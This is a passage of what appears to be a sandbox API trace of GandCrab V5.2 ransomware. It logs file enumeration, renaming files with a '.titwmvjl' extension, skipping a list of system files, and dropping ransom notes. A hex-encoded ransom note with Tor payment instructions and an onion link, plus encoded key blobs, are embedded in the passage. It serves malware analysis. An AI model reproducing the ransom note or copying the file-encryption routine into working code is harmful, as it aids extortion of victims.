4\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0070.613] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0070.614] CloseHandle (hObject=0x2bc) returned 1 [0070.614] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.615] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.615] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xf, wMilliseconds=0x3a6)) [0070.615] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.615] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0070.615] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0070.615] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\d2ca4a09d2ca4deb61a.lock") returned 79 [0070.616] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\addins\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0070.616] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.616] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.616] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\") returned 55 [0070.616] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\*" [0070.617] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x5032f8 [0070.617] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0070.617] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0070.617] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0070.617] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0070.617] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0070.617] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0070.617] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0070.617] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\d2ca4a09d2ca4deb61a.lock" [0070.617] lstrlenW (lpString=".titwmvjl") returned 9 [0070.617] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\d2ca4a09d2ca4deb61a.lock") returned 79 [0070.617] VirtualAlloc (lpAddress=0x0, dwSize=0xde, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.617] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 88 [0070.618] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\d2ca4a09d2ca4deb61a.lock") returned 79 [0070.618] lstrlenW (lpString=".lock") returned 5 [0070.618] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.618] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0070.618] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.618] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.618] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0070.618] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0070.618] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0070.618] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\TITWMVJL-DECRYPT.txt" [0070.618] lstrlenW (lpString=".titwmvjl") returned 9 [0070.618] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\TITWMVJL-DECRYPT.txt") returned 75 [0070.618] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.619] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 84 [0070.619] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\TITWMVJL-DECRYPT.txt") returned 75 [0070.619] lstrlenW (lpString=".txt") returned 4 [0070.619] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.619] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0070.619] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0070.619] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.619] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\TITWMVJL-DECRYPT.txt") returned 75 [0070.619] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\TITWMVJL-DECRYPT.txt") returned 75 [0070.619] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0070.619] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0070.619] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0070.619] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0070.619] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0070.619] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0070.619] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0070.619] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0070.619] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.620] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0070.620] FindClose (in: hFindFile=0x5032f8 | out: hFindFile=0x5032f8) returned 1 [0070.620] CloseHandle (hObject=0x2bc) returned 1 [0070.620] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0070.620] lstrcmpW (lpString1="Bibliography", lpString2=".") returned 1 [0070.620] lstrcmpW (lpString1="Bibliography", lpString2="..") returned 1 [0070.620] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Bibliography" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography" [0070.620] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\" [0070.620] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0070.620] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.621] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0070.621] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.621] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0070.621] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.621] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0070.621] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.621] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0070.621] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.621] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.622] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\\\TITWMVJL-DECRYPT.txt") returned 82 [0070.622] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0070.622] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x